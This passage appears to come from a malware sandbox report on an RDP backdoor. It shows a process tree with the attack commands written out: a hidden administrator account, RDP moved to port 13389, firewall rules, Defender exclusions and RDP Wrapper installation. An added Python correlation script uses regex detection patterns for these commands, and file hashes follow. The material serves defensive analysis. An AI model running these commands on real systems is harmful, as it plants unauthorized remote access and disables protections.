                              9⤵
                              • Modifies Windows Firewall
                              • Event Triggered Execution: Netsh Helper DLL
                              PID:4904
                          • C:\Windows\SysWOW64\reg.exe
                            reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:1304
                          • C:\Windows\SysWOW64\reg.exe
                            reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:2292
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c query session rdp-tcp
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:2392
                          • C:\Program Files\RDP Wrapper\RDPWInst.exe
                            "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
                            8⤵
                            • Server Software Component: Terminal Services DLL
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:656
                            • C:\Windows\SYSTEM32\netsh.exe
                              netsh advfirewall firewall delete rule name="Remote Desktop"
                              9⤵
                              • Modifies Windows Firewall
                              • Event Triggered Execution: Netsh Helper DLL
                              PID:548
                          • C:\Program Files\RDP Wrapper\RDPWInst.exe
                            "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
                            8⤵
                            • Server Software Component: Terminal Services DLL
                            • Executes dropped EXE
                            • Modifies WinLogon
                            • Drops file in Program Files directory
                            • System Location Discovery: System Language Discovery
                            PID:3556
                            • C:\Windows\SYSTEM32\netsh.exe
                              netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                              9⤵
                              • Modifies Windows Firewall
                              • Event Triggered Execution: Netsh Helper DLL
                              PID:3160
                          • C:\Windows\SysWOW64\reg.exe
                            reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
                            8⤵
                              PID:1716
                            • C:\Windows\SysWOW64\reg.exe
                              reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
                              8⤵
                                PID:1824
                              • C:\Windows\SysWOW64\reg.exe
                                reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
                                8⤵
                                  PID:2024
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
                                  8⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1180
                                  • C:\Windows\SysWOW64\cscript.exe
                                    cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
                                    9⤵
                                      PID:4748
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
                                    8⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1060
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
                                      9⤵
                                        PID:1828
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "10.0.19041.1202" /f
                                      8⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2020
                                    • C:\Windows\SysWOW64\findstr.exe
                                      findstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                      8⤵
                                        PID:440
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
                                        8⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3232
                                        • C:\Windows\SysWOW64\cscript.exe
                                          cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
                                          9⤵
                                          • Blocklisted process makes network request
                                          • Drops file in Program Files directory
                                          • System Location Discovery: System Language Discovery
                                          PID:2436
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c findstr /n "^" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
                                        8⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4568
                                        • C:\Windows\SysWOW64\findstr.exe
                                          findstr /n "^" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
                                          9⤵
                                            PID:3324
                                        • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                          "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
                                          8⤵
                                          • Executes dropped EXE
                                          PID:4868
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
                                          8⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4704
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
                                          8⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4740
                                        • C:\Windows\SysWOW64\findstr.exe
                                          findstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
                                          8⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2388
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\UFsvtvN\129.vbs" "C:\Users\Admin\AppData\Roaming\UFsvtvN\786.vbs" "VWpGb2JGQlZTbnBrVld4NlYxZFdRMUp0Vlcxa1IwNU9ZMVF4V1ZVd1VqTlNWemswVVRKc00wcHRPVEprYms1MFVsWnJPV1Y2ClFrWlJlbFpEVVdwR1JVeFVZelZTYWtGMENrNUVVWGxSYVRBMVVXdFZORXhVV1hoT2EwVjVUMVJHUjA5RlRrZE5TREE5" "C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll"
                                        7⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5044
                                        • C:\Windows\SysWOW64\cscript.exe
                                          cscript.exe "C:\Users\Admin\AppData\Roaming\UFsvtvN\129.vbs" "C:\Users\Admin\AppData\Roaming\UFsvtvN\786.vbs" "VWpGb2JGQlZTbnBrVld4NlYxZFdRMUp0Vlcxa1IwNU9ZMVF4V1ZVd1VqTlNWemswVVRKc00wcHRPVEprYms1MFVsWnJPV1Y2ClFrWlJlbFpEVVdwR1JVeFVZelZTYWtGMENrNUVVWGxSYVRBMVVXdFZORXhVV1hoT2EwVjVUMVJHUjA5RlRrZE5TREE5" "C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll"
                                          8⤵
                                            PID:3908
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll" /tn "MySQLNotifierTask45"
                                          7⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4900
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll" /tn "MySQLNotifierTask45"
                                            8⤵
                                            • System Location Discovery: System Language Discovery
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:788
                                  • C:\Windows\SysWOW64\PING.EXE
                                    ping 127.0.0.1 -n 30
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    • System Network Configuration Discovery: Internet Connection Discovery
                                    • Runs ping.exe
                                    PID:1248
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                              1⤵
                                PID:1076
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                1⤵
                                • Loads dropped DLL
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4544
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                1⤵
                                  PID:2056
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                  1⤵
                                  • Loads dropped DLL
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:228
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                  1⤵
                                  • Loads dropped DLL
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4908
                                • C:\Windows\System32\WScript.exe
                                  C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\UFsvtvN\589.vbs" BsuIsYeBFe XSDwEoxCiw "C:\Users\Admin\AppData\Roaming\UFsvtvN\GUICcTpn.bat"
                                  1⤵
                                  • Checks computer location settings
                                  PID:4772
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\UFsvtvN\GUICcTpn.bat
                                    2⤵
                                    • Drops file in System32 directory
                                    PID:1528
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
                                      3⤵
                                        PID:2420
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic group where sid="S-1-5-32-544" get name /value
                                          4⤵
                                            PID:1076
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
                                          3⤵
                                            PID:4328
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic group where sid="S-1-5-32-555" get name /value
                                              4⤵
                                                PID:4764
                                            • C:\Windows\system32\net.exe
                                              net user BsuIsYeBFe XSDwEoxCiw /add
                                              3⤵
                                                PID:3136
                                                • C:\Windows\system32\net1.exe
                                                  C:\Windows\system32\net1 user BsuIsYeBFe XSDwEoxCiw /add
                                                  4⤵
                                                    PID:4540
                                                • C:\Windows\system32\net.exe
                                                  net localgroup Administrators BsuIsYeBFe /add
                                                  3⤵
                                                    PID:1352
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 localgroup Administrators BsuIsYeBFe /add
                                                      4⤵
                                                        PID:4876
                                                    • C:\Windows\system32\net.exe
                                                      net localgroup Remote Desktop Users BsuIsYeBFe /add
                                                      3⤵
                                                        PID:4532
                                                        • C:\Windows\system32\net1.exe
                                                          C:\Windows\system32\net1 localgroup Remote Desktop Users BsuIsYeBFe /add
                                                          4⤵
                                                            PID:4904
                                                        • C:\Windows\system32\net.exe
                                                          net accounts /maxpwage:unlimited
                                                          3⤵
                                                            PID:2424
                                                            • C:\Windows\system32\net1.exe
                                                              C:\Windows\system32\net1 accounts /maxpwage:unlimited
                                                              4⤵
                                                                PID:4044
                                                            • C:\Windows\system32\reg.exe
                                                              reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v BsuIsYeBFe /t REG_DWORD /d "00000000" /f
                                                              3⤵
                                                              • Hide Artifacts: Hidden Users
                                                              PID:4188
                                                            • C:\Windows\system32\reg.exe
                                                              reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
                                                              3⤵
                                                                PID:876
                                                              • C:\Windows\system32\netsh.exe
                                                                netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
                                                                3⤵
                                                                • Modifies Windows Firewall
                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                PID:4192
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
                                                                3⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:2748
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
                                                                3⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:1476
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
                                                                3⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:1780
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
                                                                3⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:1920
                                                              • C:\Windows\system32\timeout.exe
                                                                Timeout /t 15
                                                                3⤵
                                                                • Delays execution with timeout.exe
                                                                PID:4080
                                                          • C:\Windows\System32\WScript.exe
                                                            C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\UFsvtvN\786.vbs" VWpGb2JGQlZTbnBrVld4NlYxZFdRMUp0Vlcxa1IwNU9ZMVF4V1ZVd1VqTlNWemswVVRKc00wcHRPVEprYms1MFVsWnJPV1Y2ClFrWlJlbFpEVVdwR1JVeFVZelZTYWtGMENrNUVVWGxSYVRBMVVXdFZORXhVV1hoT2EwVjVUMVJHUjA5RlRrZE5TREE5
                                                            1⤵
                                                            • Blocklisted process makes network request
                                                            PID:2828

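Taken one at a time, almost every command under cmd.exe PID 1528 is something an administrator types legitimately: `net user /add`, `net localgroup Administrators`, a firewall rule, a Defender exclusion, a registry edit. What identifies the RDP backdoor is that they all run as children of one script host within seconds, together with two settings no administrator combines with a new account: hiding it from the logon screen (`SpecialAccounts\UserList` = 0) and moving RDP to a non-default port (13389) with a matching allow rule. Two details of the tree are worth a practitioner's attention. First, `net localgroup Remote Desktop Users BsuIsYeBFe /add` is issued without quotes, so net.exe treats `Remote` as the group name and that step fails; it does not matter, because members of Administrators can log on over RDP without that group. Second, the RDP Wrapper branch (RDPWInst.exe -r, rdpwrap.ini fetched from GitHub) re-installs a legitimate open-source tool whose purpose is to allow concurrent RDP sessions on client editions of Windows, so the attacker's session does not kick the victim off the console. The script below is an added example, not part of the report: it correlates process-creation events by their top-most captured ancestor and flags an ancestor only when several of the indicators co-occur beneath it. The sample events are constructed from the tree above (PIDs and command lines as printed), with one constructed benign firewall change under explorer.exe added as a control; the indicator names and the threshold of three are choices made here, not anything the sandbox defines.

```python
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Optional, Set


class ProcEvent(NamedTuple):
    pid: int
    ppid: Optional[int]  # None when the parent is outside the captured set
    cmdline: str


# Command-line indicators taken from the process tree above. Each is ordinary admin activity on
# its own; only their co-occurrence under one ancestor is reported.
INDICATORS: Dict[str, re.Pattern] = {
    "local_user_added":       re.compile(r'\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b', re.I),
    "admin_group_add":        re.compile(r'\bnet1?(\.exe)?\s+localgroup\s+administrators\b.*\s/add\b', re.I),
    "hidden_from_logon":      re.compile(r'SpecialAccounts\\UserList\b.*\s/d\s+"?0+"?', re.I),
    "password_never_expires": re.compile(r'\bnet1?(\.exe)?\s+accounts\s+/maxpwage:unlimited\b', re.I),
    "rdp_port_changed":       re.compile(r'WinStations\\RDP-Tcp\b.*\bPortNumber\b', re.I),
    "rdp_security_downgrade": re.compile(r'WinStations\\RDP-Tcp\b.*\b(SecurityLayer|MinEncryptionLevel)\b', re.I),
    "firewall_rule_added":    re.compile(r'\bnetsh\s+advfirewall\s+firewall\s+add\s+rule\b', re.I),
    "defender_exclusion":     re.compile(r'\bAdd-MpPreference\s+-Exclusion(Path|Process|Extension)\b', re.I),
    "defender_no_samples":    re.compile(r'\bSet-MpPreference\s+-SubmitSamplesConsent\s+NeverSend\b', re.I),
    "rdp_wrapper":            re.compile(r'RDPWInst\.exe|RDP-Wrapper|RDP Wrapper', re.I),
    # schtasks /Create /XML pointed at a file whose extension is not .xml (here a ".dll")
    "schtask_from_non_xml":   re.compile(r'\bschtasks(\.exe)?\s+/Create\b.*\s/XML\s+"?[^"\s]+\.(?!xml\b)\w+"?(?=\s|$)', re.I),
}


def root_of(pid: int, parents: Dict[int, Optional[int]]) -> int:
    """Follow ppid links up to the top-most process for which we hold an event."""
    seen: Set[int] = set()
    while pid not in seen and parents.get(pid) is not None and parents[pid] in parents:
        seen.add(pid)
        pid = parents[pid]
    return pid


def correlate(events: List[ProcEvent], min_indicators: int = 3) -> Dict[int, List[str]]:
    """Return {root_pid: sorted indicator names} for roots whose subtree trips >= min_indicators."""
    parents = {e.pid: e.ppid for e in events}
    hits: Dict[int, Set[str]] = defaultdict(set)
    for event in events:
        for name, pattern in INDICATORS.items():
            if pattern.search(event.cmdline):
                hits[root_of(event.pid, parents)].add(name)
    return {root: sorted(names) for root, names in hits.items() if len(names) >= min_indicators}


# Constructed from the report's tree: WScript.exe 4772 -> cmd.exe 1528 -> net/reg/netsh/powershell.
SAMPLE_EVENTS = [
    ProcEvent(4772, None, r'C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\UFsvtvN\589.vbs" BsuIsYeBFe XSDwEoxCiw "C:\Users\Admin\AppData\Roaming\UFsvtvN\GUICcTpn.bat"'),
    ProcEvent(1528, 4772, r'"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\UFsvtvN\GUICcTpn.bat'),
    ProcEvent(3136, 1528, r'net user BsuIsYeBFe XSDwEoxCiw /add'),
    ProcEvent(4540, 3136, r'C:\Windows\system32\net1 user BsuIsYeBFe XSDwEoxCiw /add'),
    ProcEvent(1352, 1528, r'net localgroup Administrators BsuIsYeBFe /add'),
    ProcEvent(2424, 1528, r'net accounts /maxpwage:unlimited'),
    ProcEvent(4188, 1528, r'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v BsuIsYeBFe /t REG_DWORD /d "00000000" /f'),
    ProcEvent(876, 1528, r'reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f'),
    ProcEvent(4192, 1528, r'netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389'),
    ProcEvent(2748, 1528, r'powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"'),
    ProcEvent(1780, 1528, r'powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend'),
    # Benign control (constructed, not from the report): one firewall change from an interactive shell.
    ProcEvent(9001, None, r'C:\Windows\explorer.exe'),
    ProcEvent(9002, 9001, r'netsh advfirewall firewall add rule name="Web" protocol=TCP dir=in localport=8443 action=allow'),
]


if __name__ == "__main__":
    for root, names in correlate(SAMPLE_EVENTS).items():
        print(f"root PID {root}: {len(names)} indicators -> {', '.join(names)}")
```

On the sample the WScript.exe root is reported with eight distinct indicators while the explorer.exe root, with its single firewall rule, stays silent. In a real pipeline the event list would come from Sysmon event ID 1 or Windows 4688 with command-line auditing enabled; grouping by ancestor rather than by individual pattern is what keeps the firewall and Defender rules from paging on every administrator.
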
                                                          Network

                                                          MITRE ATT&CK Enterprise v15

                                                          Downloads

                                                          • C:\Program Files\RDP Wrapper\RDPWInst.exe

                                                            Filesize

                                                            1.4MB

                                                            MD5

                                                            3288c284561055044c489567fd630ac2

                                                            SHA1

                                                            11ffeabbe42159e1365aa82463d8690c845ce7b7

                                                            SHA256

                                                            ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

                                                            SHA512

                                                            c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

                                                          • C:\Program Files\RDP Wrapper\rdpwrap.bat

                                                            Filesize

                                                            12KB

                                                            MD5

                                                            b365fde3be7855f4254d1e4bba45d260

                                                            SHA1

                                                            b56c6f0402b25c5d68e3a722144f5f4b5bb53d27

                                                            SHA256

                                                            2a175e17c98f9d5f436e23d1c9670f36e54cb82269bccddc87dcfbcfb04d1360

                                                            SHA512

                                                            d08e261c0f5c18041d005029cc6ed6119a8cc446607bb5f683a059d1a193d8e04d3e0b52c9f2ea871fcfa8e043c5c2886cfce5419eaf37c39003236f7a399026

                                                          • C:\Program Files\RDP Wrapper\rdpwrap_new.ini

                                                            Filesize

                                                            181KB

                                                            MD5

                                                            12afc3fd401d3724956283c33eb796eb

                                                            SHA1

                                                            66b875153e6ee45c76ae374a95e2cec013ac94e8

                                                            SHA256

                                                            370681b06f7f69461f745e0ef232c7e69aa6b91a9322903ea1150ba8b2eca120

                                                            SHA512

                                                            d9957669907fb20b3a3c12770574bacc51de14de8bce426292a0c95131fb354ab369e12303c01b8d3dc394ac3e30371b2d2c3744840a86b296f8938f747cffa4

                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419

                                                            Filesize

                                                            471B

                                                            MD5

                                                            eb4b4f9fa16909112f5a8f9654620337

                                                            SHA1

                                                            0bae7b32d406005fd45bff16bc05e6b1cace5cc7

                                                            SHA256

                                                            c350c1fa26742f2393ee665608a905c6300ff39eb49bc11d1e0a33a5362bf59f

                                                            SHA512

                                                            4a35e295293c7389c2bd38b848078dae20ca48f98d8257021b240951ec16c978b8dd4ccdd69d304909a02d7b0062c8a7435e3ee1e8770ee5e11684331154ddf3

                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419

                                                            Filesize

                                                            412B

                                                            MD5

                                                            b201caf6c8471e3eebb5d6dea54aa939

                                                            SHA1

                                                            11b4fb249887c2c780281773ef648bd6018bc5e1

                                                            SHA256

                                                            ae9d5357b3dcab5fa597337aa0a5769296d8d77af34fd0f5b55212330dd91843

                                                            SHA512

                                                            af298c3eb19fa33ed7819e622da4bc9d4872975efbbce59fba77ab913e7b0c837ae8283265554483f612c116e01f0a248b2cd9588d5042e9aeefc3808439e375

                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                            Filesize

                                                            2KB

                                                            MD5

                                                            ba246bd2d86f16b8e701e797989d424b

                                                            SHA1

                                                            048769be2e48bd66ddedbfcf9d40addb6168fc16

                                                            SHA256

                                                            37c38ce312bc65167a7a6208217dedc66559bd6dd149472fd7001a8e9db310ad

                                                            SHA512

                                                            473fedc38e188d36b1f2f3db119a5c6c1e8676a24392a64b60198ab38c6725a909b8564892608760cc2dfc6a1b4f72cf4370740f97dcb0722d3fd4e0faa57bec

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            18KB

                                                            MD5

                                                            6cde20e3e0bd34f0784316814fca9234

                                                            SHA1

                                                            9bc7d4a1998c024433f801a767678cca7776a288

                                                            SHA256

                                                            ec1f3a6d3405912f6e121dd3298036919a113fb21b97c7c67829711f3bc6975e

                                                            SHA512

                                                            9109eeba074b8d1291684c821006b38a410042e4c247f6d749f7edd6df6b891fd53026c99c2b528c62683ea19780193d04b3541d62ac8465a6c4fba503d71fe4

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            18KB

                                                            MD5

                                                            052adb3bca4b5d577115b85a20102dd1

                                                            SHA1

                                                            25e84c6bc9b0a2d963c948cb76e2ff1feaee5d2e

                                                            SHA256

                                                            c6faf77fba2e1532a83199bb6144634c80c8132b8799585e7c09bad00c3cb56b

                                                            SHA512

                                                            1aec3eb587b4d2347abdf0aa9d9fb44824a73e9db3e5feb84551a25e78b4668263dab4e8c102b08e5ca5d398b8cbdba1e843bec524d2949b0bb58dd2cbc08a27

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            18KB

                                                            MD5

                                                            296cea8fecaa1c84fca65032655216ba

                                                            SHA1

                                                            5c09ec39e1cc67550d9fe7e6dbe9956bc3439f45

                                                            SHA256

                                                            bb66f62836ba3b506a692e8555395111081b9f35cb6e93dd502779090bc9ba46

                                                            SHA512

                                                            8d3ab339826382e7191f524ccb4ea7abd29536e59e56cb74391966de9ae15acad2d2496a6eb71b90d002fa0675e4f9cf578336c9b3f381af6404a9979445ce70

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            18KB

                                                            MD5

                                                            454a728332692962aa807f79f52abc20

                                                            SHA1

                                                            947b4dd59e8dea255e80dfc48d2d3fbe75922a86

                                                            SHA256

                                                            e611cbe4670f8ffd6a6d7fdcdf970e11e50259ac5ab226ae82b41ef21043ffc6

                                                            SHA512

                                                            45349c3c3e1beb1618b0687bbe082ac0680f23543a9ac27394142fbca39dcc27d5505ba6a9c52631ace4257f5491cd3c1ec63f5a7a7d5eb4861212f9a7cd978a

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            18KB

                                                            MD5

                                                            7a3d27797f1fbb1718aeea4a1dcb7d16

                                                            SHA1

                                                            c6f1b6bf30b11bbac14067a94557a439d4882607

                                                            SHA256

                                                            82d607de468ad41dd1fa06752c92c6bc8240ebc9d0bd090171f051bb4b87fd5c

                                                            SHA512

                                                            1252ed8e68bd4c30f30c45cbee37a8f8cdd8c0be7478c4c4db101278c59f87581fd69b442174daf455e0a101b6d49a064d673932ae8bca1b470d580ead145f65

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            18KB

                                                            MD5

                                                            505c0cefae83f0f26146bbb02c25fb69

                                                            SHA1

                                                            45bddc4f0d3f9db3d7b37d939885490d1c9e5365

                                                            SHA256

                                                            6f33ab91afedb5dfcf6b857e7769eb2f18d35810868002393f1c49c01459ea9e

                                                            SHA512

                                                            1fe04718ef47a93d35298792ba01db5400db5894c5509288eadccdca88e39232d11499992f16e42471b53b9d09e603fd64a2f6e9248ecd491a960cc793e11bdf

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 18KB
  MD5: ce2a869bad03dfa19128278dea57a3f5
  SHA1: 643a4424b4e7993a9c2a57916ecd8753a29028f3
  SHA256: eee2fcb18a1a5128a6d1b37b50a246d546d83b7ac8fa2689b34afb24a630da5e
  SHA512: de19fbf07eba90131e912fd7374d56b803c690dd6c9222a5b6b3af8da903d80c40848b2fbfa56929e494d12c0a57760e61b1db3d3eee5c230eb9b815f8c2b2d7

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 18KB
  MD5: d5c6e923f5d1305932aad16729f11c2d
  SHA1: aa07e24d6a56ba43516a79f8eac17eee197b0093
  SHA256: 39d092e1ead713d3abf27f251e1d39bd2b58c3e5cb53c768f4c0c6eb54e3e891
  SHA512: 53e2c4f43540c03e3228bb30e4c65201c4836756e6d9b3dd19754b7d3843ba6db28ea07eec3a50ba83a098f6239b2ed7adfe8a4c050717e1c2194b538b89075a

• C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zhumzble.j23.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

• C:\Users\Admin\AppData\Roaming\UFsvtvN\1167.vbs
  Filesize: 9KB
  MD5: fdc134c640049724853a14b692623719
  SHA1: 500ff9c4e30c34e4ab0ac0ce7c32e5f9116020a5
  SHA256: dc42333f20b3a524dc7d7a1c3301188d36642fb077758c2ab4d824a0439ecd00
  SHA512: 1b34d84d77cad63d69fcae45735c3616ff6bcac2176bfef1ce4e6d08f4bffa98a48aaa036b3f9674d516d923a353bc339290f7204436de9971e7b2ebf60f407f

• C:\Users\Admin\AppData\Roaming\UFsvtvN\129.vbs
  Filesize: 2KB
  MD5: e526da1842354849cfc018128001a6b4
  SHA1: 921f1ab5499eb550a351d4a394bd44df5d173ea5
